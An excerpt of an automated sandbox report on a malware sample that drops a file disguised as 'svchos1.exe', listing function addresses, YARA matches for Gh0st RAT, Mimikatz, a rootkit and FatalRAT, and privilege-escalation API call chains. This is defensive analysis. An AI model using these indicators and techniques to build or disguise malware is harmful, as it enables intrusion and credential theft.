Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0030B3FB	28_2_0030B3FB
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_00373708	28_2_00373708
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_00381C8C	28_2_00381C8C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016C3369	28_2_016C3369
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016D52E4	28_2_016D52E4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016C8405	28_2_016C8405
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016C87FC	28_2_016C87FC
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016DB9A4	28_2_016DB9A4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016DBD04	28_2_016DBD04
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_01705560	28_2_01705560
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016F35E5	28_2_016F35E5
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_017007C1	28_2_017007C1
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016F8681	28_2_016F8681
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_01706832	28_2_01706832
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016F8A78	28_2_016F8A78
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_01705A37	28_2_01705A37
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_016FFDFC	28_2_016FFDFC
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0170BC20	28_2_0170BC20
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0170BF80	28_2_0170BF80
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0376F364	28_2_0376F364
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0371B324	28_2_0371B324
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03784384	28_2_03784384
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0376A034	28_2_0376A034
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03715024	28_2_03715024
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03785014	28_2_03785014
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB7E0	28_2_036FB7E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_037197E4	28_2_037197E4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB7BB	28_2_036FB7BB
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0376F614	28_2_0376F614
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_037856B4	28_2_037856B4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_037846B4	28_2_037846B4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0374CB74	28_2_0374CB74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03772B74	28_2_03772B74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036F4B54	28_2_036F4B54
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB949	28_2_036FB949
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB927	28_2_036FB927
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB905	28_2_036FB905
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03771994	28_2_03771994
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03721984	28_2_03721984
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB874	28_2_036FB874
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB84F	28_2_036FB84F
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB82A	28_2_036FB82A
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB805	28_2_036FB805
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0371A804	28_2_0371A804
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB8E3	28_2_036FB8E3
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB8BE	28_2_036FB8BE
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_036FB899	28_2_036FB899
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0374AE74	28_2_0374AE74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0370AE44	28_2_0370AE44
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0376BEA4	28_2_0376BEA4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03775EA4	28_2_03775EA4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03782C04	28_2_03782C04
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038C2280	28_2_038C2280
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038341D0	28_2_038341D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0388C1F0	28_2_0388C1F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038B21F0	28_2_038B21F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03861000	28_2_03861000
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038B1010	28_2_038B1010
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0388A040	28_2_0388A040
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038887A0	28_2_038887A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038C4690	28_2_038C4690
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038546A0	28_2_038546A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038A96B0	28_2_038A96B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0383A590	28_2_0383A590
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0388B5E0	28_2_0388B5E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038AB520	28_2_038AB520
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038B5520	28_2_038B5520
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0384A4C0	28_2_0384A4C0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0388A4F0	28_2_0388A4F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0388BB60	28_2_0388BB60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038C3A00	28_2_038C3A00
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0385A9A0	28_2_0385A9A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038AE9E0	28_2_038AE9E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03859E80	28_2_03859E80
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03858E60	28_2_03858E60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038C3D30	28_2_038C3D30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038C4D30	28_2_038C4D30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_038AEC90	28_2_038AEC90
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_00376073	33_2_00376073
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0030B3FB	33_2_0030B3FB
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_00373708	33_2_00373708
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0029EB37	33_2_0029EB37
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_00381C8C	33_2_00381C8C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0302B324	33_2_0302B324
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0307F364	33_2_0307F364
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03094384	33_2_03094384
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03095014	33_2_03095014
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03025024	33_2_03025024
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0307A034	33_2_0307A034
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B7BB	33_2_0300B7BB
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B7E0	33_2_0300B7E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_030297E4	33_2_030297E4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0307F614	33_2_0307F614
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_030946B4	33_2_030946B4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_030956B4	33_2_030956B4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03004B54	33_2_03004B54
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0305CB74	33_2_0305CB74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03082B74	33_2_03082B74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B905	33_2_0300B905
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B927	33_2_0300B927
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B949	33_2_0300B949
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03031984	33_2_03031984
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03081994	33_2_03081994
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B805	33_2_0300B805
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0302A804	33_2_0302A804
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B82A	33_2_0300B82A
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B84F	33_2_0300B84F
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B874	33_2_0300B874
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B899	33_2_0300B899
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B8BE	33_2_0300B8BE
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0300B8E3	33_2_0300B8E3
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0301AE44	33_2_0301AE44
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0305AE74	33_2_0305AE74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0307BEA4	33_2_0307BEA4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03085EA4	33_2_03085EA4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03092C04	33_2_03092C04
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031D2280	33_2_031D2280
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031441D0	33_2_031441D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0319C1F0	33_2_0319C1F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031C21F0	33_2_031C21F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031C1010	33_2_031C1010
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03171000	33_2_03171000
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0319A040	33_2_0319A040
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031987A0	33_2_031987A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031D4690	33_2_031D4690
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031B96B0	33_2_031B96B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031646A0	33_2_031646A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031BB520	33_2_031BB520
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031C5520	33_2_031C5520
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0314A590	33_2_0314A590
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0319B5E0	33_2_0319B5E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0315A4C0	33_2_0315A4C0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0319A4F0	33_2_0319A4F0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0319BB60	33_2_0319BB60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031D3A00	33_2_031D3A00
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0316A9A0	33_2_0316A9A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031BE9E0	33_2_031BE9E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03168E60	33_2_03168E60
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03169E80	33_2_03169E80
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031D3D30	33_2_031D3D30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031D4D30	33_2_031D4D30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_031BEC90	33_2_031BEC90

Source: C:\Users\user\Desktop\[System Process]12.exe	Code function: String function: 02F71DE4 appears 34 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 016C3324 appears 44 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 003728D0 appears 48 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 016F35A0 appears 44 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 00372461 appears 78 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 0037242B appears 41 times
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: String function: 003723F8 appears 291 times

Source: [System Process]12.exe, 00000000.00000000.1063500610.00000000008C2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesdfsd.exe8 vs [System Process]12.exe
Source: [System Process]12.exe, 00000009.00000003.1285810304.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesdfsd.exe8 vs [System Process]12.exe
Source: [System Process]12.exe, 00000009.00000000.1277694287.00000000008C2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesdfsd.exe8 vs [System Process]12.exe

Source: [System Process]12.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 33.2.svchos1.exe.323cd38.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.37ed6bc.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.392cd38.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 33.2.svchos1.exe.30fd6bc.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 33.2.svchos1.exe.324c380.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.37fcd04.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.393c380.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.37ed6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.37ed6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.37ed6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 33.2.svchos1.exe.310cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.svchos1.exe.310cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.svchos1.exe.310cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 33.2.svchos1.exe.323cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.svchos1.exe.323cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.svchos1.exe.323cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 33.2.svchos1.exe.324c380.4.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.svchos1.exe.324c380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.svchos1.exe.324c380.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.393c380.5.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.393c380.5.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.393c380.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.37fcd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.37fcd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.37fcd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 33.2.svchos1.exe.310cd04.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 33.2.svchos1.exe.30fd6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.svchos1.exe.30fd6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.svchos1.exe.30fd6bc.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.392cd38.6.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.392cd38.6.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.392cd38.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 33.2.svchos1.exe.3000984.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
Source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
Source: 28.2.svchos1.exe.36f0984.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT

Source: classification engine

Classification label: mal100.troj.evad.winEXE@930/42@1/2

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03851B30 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	28_2_03851B30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0384B7A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	28_2_0384B7A0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03859770 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	28_2_03859770
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03161B30 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	33_2_03161B30
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_03169770 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	33_2_03169770
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0315B7A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	33_2_0315B7A0

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_03844700 GetDiskFreeSpaceExA,LoadLibraryA,GetProcAddress,lstrcpy,GetDiskFreeSpaceExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,RegEnumKeyExA,wsprintfA,wsprintfA,strchr,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcat,

28_2_03844700

Source: C:\Users\Public\Documents\MM\svchos1.exe

